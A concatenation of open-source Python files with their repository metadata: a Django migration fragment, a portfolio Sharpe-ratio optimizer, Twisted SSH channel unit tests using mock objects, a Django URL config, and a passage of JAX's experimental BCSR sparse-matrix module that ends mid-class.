            field=models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, related_name='djangocms_googlecalendar_googlecalendar', serialize=False, to='cms.CMSPlugin'),
        ),
        migrations.AlterField(
            model_name='googlecalendar',
            name='colour',
            field=models.CharField(blank=True, help_text='Colour in hex format: rrggbb', max_length=6),
        ),
    ]
| {
"content_hash": "92aa3f7295d77c5a66109eb52fce2ea5",
"timestamp": "",
"source": "github",
"line_count": 24,
"max_line_length": 232,
"avg_line_length": 35.041666666666664,
"alnum_prop": 0.6611177170035671,
"repo_name": "c4sc/arividam",
"id": "af1388afcddfc22326fe6f7f00c987a66ed7c191",
"size": "913",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "arividam/contrib/djangocms_googlecalendar/migrations/0003_auto_20160810_2005.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "10607"
},
{
"name": "HTML",
"bytes": "49340"
},
{
"name": "JavaScript",
"bytes": "3142"
},
{
"name": "Python",
"bytes": "84703"
},
{
"name": "Shell",
"bytes": "7248"
}
],
"symlink_target": ""
} |
import numpy as np
import scipy.optimize as spo
def get_portfolio_value(prices, allocs, start_val=1):
    """
    Compute the daily total value of a portfolio.

    Parameters
    ----------
    prices: DataFrame
        daily prices, one column per stock
    allocs: list
        fraction of the portfolio allocated to each stock
    start_val: float
        initial capital invested

    Returns
    ----------
    portval: Series
        total portfolio value for each day.
    """
    # Scale each column so the first day is 1.0, weight by allocation and
    # starting capital, then total across columns for every day.
    scaled = (prices / prices.iloc[0]) * allocs * start_val
    return scaled.sum(axis=1)
def get_portfolio_stats(port_val, daily_rf=0, samples_per_year=252):
    """
    Calculate statistics on given portfolio values.

    Parameters
    ----------
    port_val: Series
        the daily portfolio value
    daily_rf: float
        daily risk-free rate of return
    samples_per_year: int
        frequency of sampling

    Returns
    ----------
    cum_ret: float
        cumulative return
    avg_daily_ret: float
        average daily return
    std_daily_ret: float
        the standard deviation of daily return
    sharpe_ratio: float
        the annualized sharpe ratio
    """
    # Use positional indexing explicitly: label-based ``port_val[-1]`` only
    # worked through a positional fallback that modern pandas removed.
    cum_ret = port_val.iloc[-1]/port_val.iloc[0] - 1
    daily_ret = port_val/port_val.shift(1) - 1
    # The first daily return is NaN, hence dividing by len - 1.
    avg_daily_ret = daily_ret.sum()/(len(daily_ret) - 1)
    std_daily_ret = daily_ret[1:].std()
    sharpe_ratio = np.sqrt(samples_per_year) * (avg_daily_ret - daily_rf)/std_daily_ret
    return cum_ret, avg_daily_ret, std_daily_ret, sharpe_ratio
def __objective_fun_max_sharpe_ratio(allocs, prices):
    """
    Optimizer objective: the negated Sharpe ratio of the allocation.

    Parameters
    ----------
    allocs: list
        allocations of stocks
    prices: DataFrame
        prices of stocks

    Returns
    ----------
    val: float
        negative sharpe_ratio (minimizing it maximizes the Sharpe ratio)
    """
    daily_values = get_portfolio_value(prices, allocs, 1)
    stats = get_portfolio_stats(daily_values)
    sharpe_ratio = stats[3]
    return -sharpe_ratio
def find_optimal_allocations(prices):
    """
    Find the allocation vector that maximizes the portfolio Sharpe ratio.

    Each allocation is bounded to [0, 1] and the vector is constrained to
    sum to 1.

    Parameters
    ----------
    prices: DataFrame
        the prices of stocks

    Returns
    ----------
    alloc: ndarray
        the optimal allocation of the stocks
    """
    n_assets = len(prices.columns)
    # Start from an equal-weight portfolio.
    guess = np.full(n_assets, 1.0 / n_assets)
    bounds = tuple((0, 1) for _ in range(n_assets))
    result = spo.minimize(
        __objective_fun_max_sharpe_ratio,  # objective function
        guess,                             # initial guess
        args=(prices,),                    # extra args for the objective
        method='SLSQP',                    # optimizer supporting constraints
        # equality constraint: allocations must sum to one
        constraints=({'type': 'eq', 'fun': lambda x: 1 - np.sum(x)}),
        bounds=bounds,
        options={'disp': True}             # display convergence message
    )
    return result.x
"content_hash": "15e701ef6edcb859eed662ae10d9de7c",
"timestamp": "",
"source": "github",
"line_count": 120,
"max_line_length": 113,
"avg_line_length": 27.441666666666666,
"alnum_prop": 0.6085636197995749,
"repo_name": "hchim/stockanalyzer",
"id": "0eaa6c35bbabb0b2f01607ec85991310c74e0409",
"size": "3293",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "analysis/portfolio.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "127452"
}
],
"symlink_target": ""
} |
"""
Test ssh/channel.py.
"""
from twisted.conch.ssh import channel
from twisted.trial import unittest
class MockTransport(object):
    """
    Stand-in transport exposing only getPeer() and getHost().

    Channels implement ITransport, and their getPeer()/getHost() return
    ('SSH', <transport's getPeer/Host value>), so the channel under test
    needs a transport that can answer these two calls.
    """
    def getPeer(self):
        """Return a recognizable fake peer address."""
        return ('MockPeer',)
    def getHost(self):
        """Return a recognizable fake host address."""
        return ('MockHost',)
class MockConnection(object):
    """
    A mock for twisted.conch.ssh.connection.SSHConnection that records the
    data channels send and when they request a close.
    @ivar data: a C{dict} mapping channel id #s to lists of data sent by that
        channel.
    @ivar extData: a C{dict} mapping channel id #s to lists of 2-tuples
        (extended data type, data) sent by that channel.
    @ivar closes: a C{dict} mapping channel id #s to True if that channel sent
        a close message.
    """
    transport = MockTransport()
    def __init__(self):
        self.data = {}
        self.extData = {}
        self.closes = {}
    def logPrefix(self):
        """
        Return the prefix used when logging for this connection.
        """
        return "MockConnection"
    def sendData(self, channel, data):
        """
        Append *data* to the record kept for *channel*.
        """
        if channel not in self.data:
            self.data[channel] = []
        self.data[channel].append(data)
    def sendExtendedData(self, channel, type, data):
        """
        Append (type, data) to the extended-data record for *channel*.
        """
        if channel not in self.extData:
            self.extData[channel] = []
        self.extData[channel].append((type, data))
    def sendClose(self, channel):
        """
        Mark *channel* as having requested a close.
        """
        self.closes[channel] = True
class ChannelTests(unittest.TestCase):
    """
    Unit tests for twisted.conch.ssh.channel.SSHChannel, driven through the
    MockConnection/MockTransport doubles defined above.
    """
    def setUp(self):
        """
        Initialize the channel.  remoteMaxPacket is 10 so that data is able
        to be sent (the default of 0 means no data is sent because no packets
        are made).
        """
        self.conn = MockConnection()
        self.channel = channel.SSHChannel(conn=self.conn,
                                          remoteMaxPacket=10)
        self.channel.name = 'channel'
    def test_init(self):
        """
        Test that SSHChannel initializes correctly.  localWindowSize defaults
        to 131072 (2**17) and localMaxPacket to 32768 (2**15) as reasonable
        defaults (what OpenSSH uses for those variables).
        The values in the second set of assertions are meaningless; they serve
        only to verify that the instance variables are assigned in the correct
        order.
        """
        c = channel.SSHChannel(conn=self.conn)
        self.assertEqual(c.localWindowSize, 131072)
        self.assertEqual(c.localWindowLeft, 131072)
        self.assertEqual(c.localMaxPacket, 32768)
        self.assertEqual(c.remoteWindowLeft, 0)
        self.assertEqual(c.remoteMaxPacket, 0)
        self.assertEqual(c.conn, self.conn)
        self.assertEqual(c.data, None)
        self.assertEqual(c.avatar, None)
        c2 = channel.SSHChannel(1, 2, 3, 4, 5, 6, 7)
        self.assertEqual(c2.localWindowSize, 1)
        self.assertEqual(c2.localWindowLeft, 1)
        self.assertEqual(c2.localMaxPacket, 2)
        self.assertEqual(c2.remoteWindowLeft, 3)
        self.assertEqual(c2.remoteMaxPacket, 4)
        self.assertEqual(c2.conn, 5)
        self.assertEqual(c2.data, 6)
        self.assertEqual(c2.avatar, 7)
    def test_str(self):
        """
        Test that str(SSHChannel) gives the channel name and local and
        remote windows at a glance.
        """
        self.assertEqual(str(self.channel), '<SSHChannel channel (lw 131072 '
                         'rw 0)>')
    def test_logPrefix(self):
        """
        Test that SSHChannel.logPrefix gives the name of the channel, the
        local channel ID and the underlying connection.
        """
        self.assertEqual(self.channel.logPrefix(), 'SSHChannel channel '
                         '(unknown) on MockConnection')
    def test_addWindowBytes(self):
        """
        Test that addWindowBytes adds bytes to the window and resumes writing
        if it was paused.
        """
        cb = [False]
        def stubStartWriting():
            cb[0] = True
        self.channel.startWriting = stubStartWriting
        # Queue data while the remote window is 0; nothing is sent yet.
        self.channel.write('test')
        self.channel.writeExtended(1, 'test')
        self.channel.addWindowBytes(50)
        self.assertEqual(self.channel.remoteWindowLeft, 50 - 4 - 4)
        self.assertTrue(self.channel.areWriting)
        self.assertTrue(cb[0])
        self.assertEqual(self.channel.buf, '')
        self.assertEqual(self.conn.data[self.channel], ['test'])
        self.assertEqual(self.channel.extBuf, [])
        self.assertEqual(self.conn.extData[self.channel], [(1, 'test')])
        # Already writing: startWriting must not fire again.
        cb[0] = False
        self.channel.addWindowBytes(20)
        self.assertFalse(cb[0])
        # After loseConnection, new window bytes don't resume writing.
        self.channel.write('a'*80)
        self.channel.loseConnection()
        self.channel.addWindowBytes(20)
        self.assertFalse(cb[0])
    def test_requestReceived(self):
        """
        Test that requestReceived handles requests by dispatching them to
        request_* methods.
        """
        self.channel.request_test_method = lambda data: data == ''
        self.assertTrue(self.channel.requestReceived('test-method', ''))
        self.assertFalse(self.channel.requestReceived('test-method', 'a'))
        self.assertFalse(self.channel.requestReceived('bad-method', ''))
    def test_closeReceieved(self):
        """
        Test that the default closeReceived closes the connection.
        """
        self.assertFalse(self.channel.closing)
        self.channel.closeReceived()
        self.assertTrue(self.channel.closing)
    def test_write(self):
        """
        Test that write handles data correctly.  Send data up to the size
        of the remote window, splitting the data into packets of length
        remoteMaxPacket.
        """
        cb = [False]
        def stubStopWriting():
            cb[0] = True
        # no window to start with
        self.channel.stopWriting = stubStopWriting
        self.channel.write('d')
        self.channel.write('a')
        self.assertFalse(self.channel.areWriting)
        self.assertTrue(cb[0])
        # regular write
        self.channel.addWindowBytes(20)
        self.channel.write('ta')
        data = self.conn.data[self.channel]
        self.assertEqual(data, ['da', 'ta'])
        self.assertEqual(self.channel.remoteWindowLeft, 16)
        # larger than max packet
        self.channel.write('12345678901')
        self.assertEqual(data, ['da', 'ta', '1234567890', '1'])
        self.assertEqual(self.channel.remoteWindowLeft, 5)
        # running out of window
        cb[0] = False
        self.channel.write('123456')
        self.assertFalse(self.channel.areWriting)
        self.assertTrue(cb[0])
        self.assertEqual(data, ['da', 'ta', '1234567890', '1', '12345'])
        self.assertEqual(self.channel.buf, '6')
        self.assertEqual(self.channel.remoteWindowLeft, 0)
    def test_writeExtended(self):
        """
        Test that writeExtended handles data correctly.  Send extended data
        up to the size of the window, splitting the extended data into packets
        of length remoteMaxPacket.
        """
        cb = [False]
        def stubStopWriting():
            cb[0] = True
        # no window to start with
        self.channel.stopWriting = stubStopWriting
        self.channel.writeExtended(1, 'd')
        self.channel.writeExtended(1, 'a')
        self.channel.writeExtended(2, 't')
        self.assertFalse(self.channel.areWriting)
        self.assertTrue(cb[0])
        # regular write
        self.channel.addWindowBytes(20)
        self.channel.writeExtended(2, 'a')
        data = self.conn.extData[self.channel]
        self.assertEqual(data, [(1, 'da'), (2, 't'), (2, 'a')])
        self.assertEqual(self.channel.remoteWindowLeft, 16)
        # larger than max packet
        self.channel.writeExtended(3, '12345678901')
        self.assertEqual(data, [(1, 'da'), (2, 't'), (2, 'a'),
                                (3, '1234567890'), (3, '1')])
        self.assertEqual(self.channel.remoteWindowLeft, 5)
        # running out of window
        cb[0] = False
        self.channel.writeExtended(4, '123456')
        self.assertFalse(self.channel.areWriting)
        self.assertTrue(cb[0])
        self.assertEqual(data, [(1, 'da'), (2, 't'), (2, 'a'),
                                (3, '1234567890'), (3, '1'), (4, '12345')])
        self.assertEqual(self.channel.extBuf, [[4, '6']])
        self.assertEqual(self.channel.remoteWindowLeft, 0)
    def test_writeSequence(self):
        """
        Test that writeSequence is equivalent to write(''.join(sequence)).
        """
        self.channel.addWindowBytes(20)
        self.channel.writeSequence(map(str, range(10)))
        self.assertEqual(self.conn.data[self.channel], ['0123456789'])
    def test_loseConnection(self):
        """
        Test that loseConnection() doesn't close the channel until all
        the data is sent.
        """
        self.channel.write('data')
        self.channel.writeExtended(1, 'datadata')
        self.channel.loseConnection()
        self.assertEqual(self.conn.closes.get(self.channel), None)
        self.channel.addWindowBytes(4) # send regular data
        self.assertEqual(self.conn.closes.get(self.channel), None)
        self.channel.addWindowBytes(8) # send extended data
        self.assertTrue(self.conn.closes.get(self.channel))
    def test_getPeer(self):
        """
        Test that getPeer() returns ('SSH', <connection transport peer>).
        """
        self.assertEqual(self.channel.getPeer(), ('SSH', 'MockPeer'))
    def test_getHost(self):
        """
        Test that getHost() returns ('SSH', <connection transport host>).
        """
        self.assertEqual(self.channel.getHost(), ('SSH', 'MockHost'))
| {
"content_hash": "b1c7ae8390ccb6d549d84ca60baf35fa",
"timestamp": "",
"source": "github",
"line_count": 276,
"max_line_length": 78,
"avg_line_length": 36.221014492753625,
"alnum_prop": 0.6135840752225667,
"repo_name": "bdh1011/wau",
"id": "dcb63570f1075e3c75bee58ffdf44b8864a7d951",
"size": "10078",
"binary": false,
"copies": "8",
"ref": "refs/heads/master",
"path": "venv/lib/python2.7/site-packages/twisted/conch/test/test_channel.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "1176"
},
{
"name": "C",
"bytes": "5022853"
},
{
"name": "C++",
"bytes": "43676"
},
{
"name": "CSS",
"bytes": "10359"
},
{
"name": "D",
"bytes": "1841"
},
{
"name": "FORTRAN",
"bytes": "3707"
},
{
"name": "GAP",
"bytes": "14120"
},
{
"name": "Groff",
"bytes": "7236"
},
{
"name": "HTML",
"bytes": "1709320"
},
{
"name": "JavaScript",
"bytes": "1200059"
},
{
"name": "Jupyter Notebook",
"bytes": "310219"
},
{
"name": "Lua",
"bytes": "11887"
},
{
"name": "Makefile",
"bytes": "112163"
},
{
"name": "Mako",
"bytes": "412"
},
{
"name": "Objective-C",
"bytes": "1291"
},
{
"name": "Perl",
"bytes": "171375"
},
{
"name": "Python",
"bytes": "49407229"
},
{
"name": "Ruby",
"bytes": "58403"
},
{
"name": "Shell",
"bytes": "47672"
},
{
"name": "Smarty",
"bytes": "22599"
},
{
"name": "Tcl",
"bytes": "426334"
},
{
"name": "XSLT",
"bytes": "153073"
}
],
"symlink_target": ""
} |
""" urls.py for flatpagewiki app
"""
from django.conf.urls.defaults import *
# Route /<slug>/ (any single path segment) to flatpagewiki.views.showpage.
# NOTE(review): patterns() and string view names are Django <= 1.7 APIs.
urlpatterns = patterns('flatpagewiki.views',
    (r'^(?P<slug>[^/]+)/$', 'showpage'),
) | {
"content_hash": "25f585c6a9ee80098b8e9323f890ee09",
"timestamp": "",
"source": "github",
"line_count": 11,
"max_line_length": 44,
"avg_line_length": 15.727272727272727,
"alnum_prop": 0.6127167630057804,
"repo_name": "snowcloud/django-flatpagewiki",
"id": "2a82f5e4c1b606fae0fa42fc6259dec86e722a57",
"size": "173",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "flatpagewiki/urls.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Python",
"bytes": "6535"
}
],
"symlink_target": ""
} |
"""BCSR (Bached compressed row) matrix object and associated primitives."""
import operator
from typing import NamedTuple, Sequence, Tuple
import numpy as np
from jax import core
from jax.experimental.sparse._base import JAXSparse
from jax.experimental.sparse import bcoo
from jax.experimental.sparse.util import _broadcasting_vmap, _count_stored_elements, _csr_to_coo, _safe_asarray
import jax.numpy as jnp
from jax.util import split_list, safe_zip
from jax.interpreters import batching
from jax.interpreters import mlir
# Type alias: a static array shape, e.g. (3, 4).
Shape = Tuple[int, ...]
class BCSRProperties(NamedTuple):
  # Structural properties of a BCSR array:
  #   n_batch: number of leading batch dimensions
  #   n_dense: number of trailing dense dimensions
  #   nse:     number of stored elements per batch
  n_batch: int
  n_dense: int
  nse: int
def _compatible(shape1, shape2):
return all(s1 in (1, s2) for s1, s2 in safe_zip(shape1, shape2))
def _validate_bcsr_indices(indices: jnp.ndarray, indptr: jnp.ndarray,
                           shape: Sequence[int]) -> BCSRProperties:
  """Validate BCSR ``indices``/``indptr`` against ``shape``.

  Returns the derived BCSRProperties (n_batch, n_dense, nse); raises
  ValueError when batch dimensions or the indptr length don't match.
  """
  assert jnp.issubdtype(indices.dtype, jnp.integer)
  assert jnp.issubdtype(indptr.dtype, jnp.integer)
  shape = tuple(shape)
  # nse is the trailing dimension of indices; dims before it are batch dims.
  nse = indices.shape[-1]
  n_batch = indices.ndim - 1
  # 2 sparse dims (rows, cols); anything left over is dense.
  n_dense = len(shape) - n_batch - 2
  assert n_dense >= 0
  if not _compatible(indices.shape[:n_batch], shape[:n_batch]):
    raise ValueError("indices batch dimensions not compatible for "
                     f"indices.shape={indices.shape}, shape={shape}")
  if not _compatible(indptr.shape[:n_batch], shape[:n_batch]):
    raise ValueError("indptr batch dimensions not compatible for "
                     f"indptr.shape={indptr.shape}, shape={shape}")
  # CSR invariant: one indptr entry per sparse row, plus one.
  if indptr.shape[n_batch:] != (shape[n_batch] + 1,):
    raise ValueError("indptr shape must match the matrix shape plus 1.")
  return BCSRProperties(n_batch=n_batch, n_dense=n_dense, nse=nse)
def _validate_bcsr(data: jnp.ndarray, indices: jnp.ndarray,
                   indptr: jnp.ndarray, shape: Sequence[int]) -> BCSRProperties:
  """Validate a full BCSR triple (data, indices, indptr) against ``shape``.

  Extends _validate_bcsr_indices with checks on the data array's batch and
  dense dimensions; returns the derived BCSRProperties.
  """
  props = _validate_bcsr_indices(indices, indptr, shape)
  shape = tuple(shape)
  n_batch, n_dense, nse = props.n_batch, props.n_dense, props.nse
  n_sparse = len(shape) - n_batch - n_dense
  if n_sparse != 2:
    raise ValueError("BCSR array must have 2 sparse dimensions; "
                     f"{n_sparse} is given.")
  if not _compatible(data.shape[:n_batch], shape[:n_batch]):
    raise ValueError("data batch dimensions not compatible for "
                     f"data.shape={data.shape}, shape={shape}")
  # data must end with (nse,) followed by the dense dims of shape.
  if data.shape[-(n_dense + 1):] != (nse,) + shape[n_batch + 2:]:
    raise ValueError(f"Invalid data.shape={data.shape} for "
                     f"nse={nse}, n_batch={n_batch}, n_dense={n_dense}")
  return props
def _bcsr_to_bcoo(indices: jnp.ndarray, indptr: jnp.ndarray, *,
                  shape: Sequence[int]) -> jnp.ndarray:
  """Given BCSR (indices, indptr), return BCOO (indices)."""
  n_batch, _, _ = _validate_bcsr_indices(indices, indptr, shape)
  # Apply the CSR->COO expansion under one vmap per batch dimension.
  csr_to_coo = _csr_to_coo
  for _ in range(n_batch):
    csr_to_coo = _broadcasting_vmap(csr_to_coo)
  # Stack (row, col) along a new trailing axis to get COO-style indices.
  return jnp.stack(csr_to_coo(indices, indptr), axis=indices.ndim)
#--------------------------------------------------------------------
# bcsr_fromdense
# Primitive converting a dense array to BCSR; its outputs are the
# (data, indices, indptr) triple, hence multiple_results.
bcsr_fromdense_p = core.Primitive('bcsr_fromdense')
bcsr_fromdense_p.multiple_results = True
# Message shown when nse is a tracer rather than a static Python int.
_TRACED_NSE_ERROR = """
The error arose for the nse argument of bcsr_fromdense. In order for
BCSR.fromdense() to be used in traced/compiled code, you must pass a concrete
value to the nse (number of stored elements) argument.
"""
def bcsr_fromdense(mat, *, nse=None, n_batch=0, n_dense=0, index_dtype=jnp.int32):
  """Create BCSR-format sparse matrix from a dense matrix.
  Args:
    mat : array to be converted to BCSR.
    nse : number of stored elements in each batch; computed from ``mat``
      when not given.
    n_batch : number of batch dimensions (default: 0)
    n_dense : number of dense dimensions (default: 0)
    index_dtype : dtype of sparse indices (default: int32)
  Returns:
    mat_bcsr: BCSR representation of the matrix.
  """
  mat = jnp.asarray(mat)
  if nse is None:
    nse = _count_stored_elements(mat, n_batch, n_dense)
  # nse must be a static Python int; a tracer here raises _TRACED_NSE_ERROR.
  nse = core.concrete_or_error(operator.index, nse, _TRACED_NSE_ERROR)
  return BCSR(_bcsr_fromdense(mat, nse=nse, n_batch=n_batch, n_dense=n_dense,
                              index_dtype=index_dtype),
              shape=mat.shape)
def _bcsr_fromdense(mat, *, nse, n_batch=0, n_dense=0, index_dtype=jnp.int32):
  """Create BCSR-format sparse matrix from a dense matrix.
  Args:
    mat : array to be converted to BCSR, with
      ``ndim = n_batch + n_sparse + n_dense``.
    nse : number of stored elements in each batch.
    n_batch : number of batch dimensions (default: 0)
    n_dense : number of dense dimensions (default: 0)
    index_dtype : dtype of sparse indices (default: int32)
  Returns:
    data : array of shape
      ``mat.shape[:n_batch] + (nse,) + mat.shape[mat.ndim - n_dense:]``
      and dtype ``mat.dtype``
    indices : array of shape ``mat.shape[:n_batch] + (nse,)`` and dtype of
      ``index_type``.
    indptr: array of shape ``mat.shape[:n_batch] + (mat.shape[n_batch] + 1,)``
      and dtype of ``index_type``.
  """
  mat = jnp.asarray(mat)
  # nse must be static so output shapes are known at trace time.
  nse = core.concrete_or_error(operator.index, nse, _TRACED_NSE_ERROR)
  return bcsr_fromdense_p.bind(mat, nse=nse, n_batch=n_batch, n_dense=n_dense,
                               index_dtype=index_dtype)
@bcsr_fromdense_p.def_impl
def _bcsr_fromdense_impl(mat, *, nse, n_batch, n_dense, index_dtype):
  """Concrete implementation: build a BCOO array first, then convert its
  COO-style indices to CSR (indices, indptr)."""
  mat = jnp.asarray(mat)
  n_sparse = mat.ndim - n_dense - n_batch
  if n_sparse != 2:
    raise ValueError("bcsr_fromdense: must have 2 sparse dimensions.")
  bcoo_mat = bcoo.bcoo_fromdense(mat, nse=nse, index_dtype=index_dtype,
                                 n_dense=n_dense, n_batch=n_batch)
  indices, indptr = bcoo._bcoo_to_bcsr(bcoo_mat.indices, shape=mat.shape)
  return bcoo_mat.data, indices, indptr
@bcsr_fromdense_p.def_abstract_eval
def _bcsr_fromdense_abstract_eval(mat, *, nse, n_batch, n_dense, index_dtype):
  """Abstract eval rule for bcsr_fromdense_p.

  Computes the (data, indices, indptr) output avals from the input aval
  without touching values. (Renamed from the copy-pasted
  ``_bcoo_fromdense_abstract_eval``; binding happens via the decorator, so
  no caller references the old name.)
  """
  n_sparse = mat.ndim - n_batch - n_dense
  if n_sparse != 2:
    raise ValueError("bcsr_fromdense: must have 2 sparse dimensions.")
  data_shape = mat.shape[:n_batch] + (nse,) + mat.shape[n_batch + n_sparse:]
  index_shape = mat.shape[:n_batch] + (nse,)
  indptr_shape = mat.shape[:n_batch] + (mat.shape[n_batch] + 1,)
  return (core.ShapedArray(data_shape, mat.dtype),
          core.ShapedArray(index_shape, index_dtype),
          core.ShapedArray(indptr_shape, index_dtype))
def _bcsr_fromdense_batching_rule(batched_args, batch_dims, *, nse, n_batch,
                                  n_dense, index_dtype):
  """vmap rule: a mapped leading axis becomes one more BCSR batch dim."""
  M, = batched_args
  if batch_dims != (0,):
    raise NotImplementedError(f"batch_dims={batch_dims}")
  new_n_batch = n_batch + 1
  n_sparse = M.ndim - n_dense - new_n_batch
  if n_sparse != 2:
    raise ValueError("_bcsr_fromdense_batching_rule: must have 2 sparse "
                     f"dimensions but {n_sparse} is given.")
  # All three outputs (data, indices, indptr) are batched along axis 0.
  return _bcsr_fromdense(M, nse=nse, n_batch=new_n_batch, n_dense=n_dense,
                         index_dtype=index_dtype), (0, 0, 0)
batching.primitive_batchers[bcsr_fromdense_p] = _bcsr_fromdense_batching_rule
# Lower to MLIR by tracing the reference implementation.
mlir.register_lowering(bcsr_fromdense_p, mlir.lower_fun(
    _bcsr_fromdense_impl, multiple_results=True))
#----------------------------------------------------------------------
# bcsr_todense
# Primitive converting a BCSR triple back to a dense array.
bcsr_todense_p = core.Primitive('bcsr_todense')
def bcsr_todense(mat):
  """Convert batched sparse matrix to a dense matrix.
  Args:
    mat: BCSR matrix.
  Returns:
    The dense version of ``mat``.
  """
  return _bcsr_todense(mat.data, mat.indices, mat.indptr,
                       shape=tuple(mat.shape))
def _bcsr_todense(data, indices, indptr, *, shape):
  """Convert batched sparse matrix to a dense matrix.
  Args:
    data : array of shape ``batch_dims + (nse,) + dense_dims``.
    indices : array of shape ``batch_dims + (nse,)``.
    indptr : array of shape ``batch_dims + (shape[len(batch_dims)] + 1,)``.
    shape : tuple; the shape of the (batched) matrix. Equal to
      ``batch_dims + 2(sparse_dims) + dense_dims``
  Returns:
    mat : array with specified shape and dtype matching ``data``
  """
  return bcsr_todense_p.bind(jnp.asarray(data), jnp.asarray(indices),
                             jnp.asarray(indptr), shape=shape)
@bcsr_todense_p.def_impl
def _bcsr_todense_impl(data, indices, indptr, *, shape):
  """Concrete implementation: densify by routing through BCOO."""
  bcoo_indices = _bcsr_to_bcoo(indices, indptr, shape=shape)
  return (bcoo.BCOO((data, bcoo_indices), shape=shape)).todense()
@bcsr_todense_p.def_abstract_eval
def _bcsr_todense_abstract_eval(data, indices, indptr, *, shape):
  """Abstract eval: the dense result has ``shape`` and data's dtype."""
  _validate_bcsr(data, indices, indptr, shape)
  return core.ShapedArray(shape, data.dtype)
def _bcsr_todense_batching_rule(batched_args, batch_dims, *, shape):
  """vmap rule: give unbatched operands a leading singleton axis, then
  densify; the result is batched along axis 0."""
  data, indices, indptr = batched_args
  if any(b not in [0, None] for b in batch_dims):
    raise NotImplementedError(f"batch_dims={batch_dims}. "
                              "Only 0 and None are supported.")
  if batch_dims[0] is None:
    data = data[None, ...]
  if batch_dims[1] is None:
    indices = indices[None, ...]
  if batch_dims[2] is None:
    indptr = indptr[None, ...]
  return _bcsr_todense(data, indices, indptr, shape=shape), 0
batching.primitive_batchers[bcsr_todense_p] = _bcsr_todense_batching_rule
# Lower to MLIR by tracing the reference implementation.
mlir.register_lowering(bcsr_todense_p, mlir.lower_fun(
    _bcsr_todense_impl, multiple_results=False))
#--------------------------------------------------------------------
# bcsr_extract
bcsr_extract_p = core.Primitive('bcsr_extract')
def bcsr_extract(indices, indptr, mat):
  """Extract values from a dense matrix at given BCSR (indices, indptr).

  Args:
    indices: An ndarray; see BCSR indices.
    indptr: An ndarray; see BCSR indptr.
    mat: A dense matrix.

  Returns:
    An ndarray; see BCSR data.
  """
  return bcsr_extract_p.bind(indices, indptr, mat)
@bcsr_extract_p.def_impl
def _bcsr_extract_impl(indices, indptr, mat):
  # Eager implementation: convert the CSR structure to BCOO indices and defer
  # the actual gather to bcoo_extract.
  mat = jnp.asarray(mat)
  bcoo_indices = _bcsr_to_bcoo(indices, indptr, shape=mat.shape)
  return bcoo.bcoo_extract(bcoo_indices, mat)
@bcsr_extract_p.def_abstract_eval
def _bcsr_extract_abstract_eval(indices, indptr, mat):
  # Output layout: batch dims, then the nse axis, then any trailing dense
  # dims carried over from the input matrix.
  n_batch, n_dense, nse = _validate_bcsr_indices(indices, indptr, mat.shape)
  out_shape = mat.shape[:n_batch] + (nse,) + mat.shape[mat.ndim - n_dense:]
  return core.ShapedArray(out_shape, mat.dtype)

mlir.register_lowering(bcsr_extract_p, mlir.lower_fun(
    _bcsr_extract_impl, multiple_results=False))
class BCSR(JAXSparse):
  """Experimental batched CSR matrix implemented in JAX.

  Stored as a triplet of buffers:
    data    : ``batch_dims + (nse,) + dense_dims``
    indices : ``batch_dims + (nse,)`` column indices
    indptr  : ``batch_dims + (n_rows + 1,)`` row pointers
  """
  data: jnp.ndarray
  indices: jnp.ndarray
  indptr: jnp.ndarray
  shape: Shape
  # Number of stored elements per batch entry.
  nse = property(lambda self: self.indices.shape[-1])
  dtype = property(lambda self: self.data.dtype)
  n_batch = property(lambda self: self.indices.ndim - 1)
  # CSR storage always has exactly two sparse dimensions.
  n_sparse = property(lambda _: 2)
  n_dense = property(lambda self: self.data.ndim - self.indices.ndim)

  @property
  def _sparse_shape(self):
    # The two sparsely-stored dimensions, between batch and dense dims.
    return tuple(self.shape[self.n_batch:self.n_batch + 2])

  def __init__(self, args, *, shape):
    # JAX transforms will sometimes instantiate pytrees with null values, so we
    # must catch that in the initialization of inputs.
    self.data, self.indices, self.indptr = _safe_asarray(args)
    super().__init__(args, shape=shape)

  def __repr__(self):
    """Summarize dtype/shape/nse; must not raise even on invalid state."""
    name = self.__class__.__name__
    try:
      nse = self.nse
      n_batch = self.n_batch
      n_dense = self.n_dense
      dtype = self.dtype
      shape = list(self.shape)
    except Exception:  # pylint: disable=broad-except
      repr_ = f"{name}(<invalid>)"
    else:
      extra = f", nse={nse}"
      if n_batch: extra += f", n_batch={n_batch}"
      if n_dense: extra += f", n_dense={n_dense}"
      repr_ = f"{name}({dtype}{shape}{extra})"
    if isinstance(self.data, core.Tracer):
      # Make it visible when the contents are abstract tracers.
      repr_ = f"{type(self.data).__name__}[{repr_}]"
    return repr_

  def transpose(self, *args, **kwargs):
    """Not supported for BCSR."""
    # Fixed typo in the error message ("Tranpose").
    raise NotImplementedError("Transpose is not implemented.")

  def tree_flatten(self):
    # The three buffers are the pytree children; no static aux data here.
    return (self.data, self.indices, self.indptr), {}

  @classmethod
  def _empty(cls, shape, *, dtype=None, index_dtype='int32', n_dense=0,
             n_batch=0, nse=0):
    """Create an empty BCSR instance. Public method is sparse.empty()."""
    shape = tuple(shape)
    if n_dense < 0 or n_batch < 0 or nse < 0:
      # Fixed missing space between "n_dense=...," and "n_batch=".
      raise ValueError(f"Invalid inputs: shape={shape}, n_dense={n_dense}, "
                       f"n_batch={n_batch}, nse={nse}")
    n_sparse = len(shape) - n_dense - n_batch
    if n_sparse != 2:
      raise ValueError("BCSR sparse.empty: must have 2 sparse dimensions.")
    batch_shape, sparse_shape, dense_shape = split_list(shape,
                                                        [n_batch, n_sparse])
    data = jnp.zeros((*batch_shape, nse, *dense_shape), dtype)
    # Out-of-range column index marks padding entries.
    indices = jnp.full((*batch_shape, nse), jnp.array(sparse_shape[1]),
                       index_dtype)
    indptr = jnp.zeros((*batch_shape, sparse_shape[0] + 1), index_dtype)
    return cls((data, indices, indptr), shape=shape)

  @classmethod
  def fromdense(cls, mat, *, nse=None, index_dtype=np.int32, n_dense=0,
                n_batch=0):
    """Create a BCSR array from a (dense) :class:`DeviceArray`."""
